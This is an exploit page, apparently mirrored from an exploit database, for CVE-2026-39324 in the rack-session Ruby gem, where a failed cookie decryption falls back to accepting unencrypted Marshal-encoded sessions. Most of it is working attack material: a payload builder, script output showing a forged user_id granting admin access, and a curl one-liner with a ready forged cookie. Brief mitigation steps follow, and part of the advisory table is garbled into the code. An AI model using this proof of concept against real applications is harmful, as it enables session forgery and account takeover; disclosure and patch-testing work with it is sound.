Share 
## https://sploitus.com/exploit?id=35C5AAD4-3968-51F1-9C7C-1421706507CC
# CVE-2026-39324

**Rack::Session::Cookie decrypt failure falls back to accepting unencrypted cookies**

|  |  |
|--|--|
| Advisory | [GHSA-33qg-7wpp-89cq](https://github.com/rack/rack-session/security/advisories/GHSA-33qg-7wpp-89cq) |
| Package | rack-session (RubyGems) |
| Affected |  "attacker-forged", "user_id" => 2 }
cookie  = Base64.strict_encode64(Marshal.dump(payload))
```

**2) Server-side flow when it receives the forged cookie:**
```
encryptor #1 decrypt โ†’ HMAC invalid
encryptor #2 decrypt โ†’ HMAC invalid
fallback โ†’ coder.decode() โ†’ Marshal.load โ†’ attacker session accepted
โ†’ session["user_id"] = 2 โ†’ admin user resolved โ†’ 200 OK
```

### Output

```
$ ruby attack.rb
--- CVE-2026-39324: Session Forgery ---
Target:  http://127.0.0.1:9416
Payload: {"session_id" => "attacker-forged", "user_id" => 2}
Cookie:  rack.session=BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiFGF0dGFja2VyLWZvcmdlZAY7AFRJIgx1c2VyX2lkBjsAVGkH

Session cookie encryptor error: HMAC is invalid   โ† encryptor #1 failed
Session cookie encryptor error: HMAC is invalid   โ† encryptor #2 failed, but cookie not rejected
Status: 200
Body:   {"status" => "ok", "message" => "admin panel", "session_hash" => {"session_id" => "attacker-forged", "user_id" => 2}, "current_user" => {"id" => 2, "email" => "admin@example.test", "admin" => true}}

[!] VULNERABLE โ€” forged user_id=2 accepted, admin access granted.
```

Both HMAC checks fail, but the cookie isn't rejected โ€” the fallback coder accepts it and the attacker gets admin.

### curl

```bash
ruby -rbase64 -e 'puts Base64.strict_encode64(Marshal.dump({"user_id"=>2}))'
# โ†’ BAh7BkkiDHVzZXJfaWQGOgZFVGkH

curl http://127.0.0.1:9416/admin -H 'Cookie: rack.session=BAh7BkkiDHVzZXJfaWQGOgZFVGkH'
```

## Mitigation

1. Update `rack-session` to >= 2.1.2
2. Rotate session secrets after updating โ€” forged sessions may have been accepted and re-issued before patching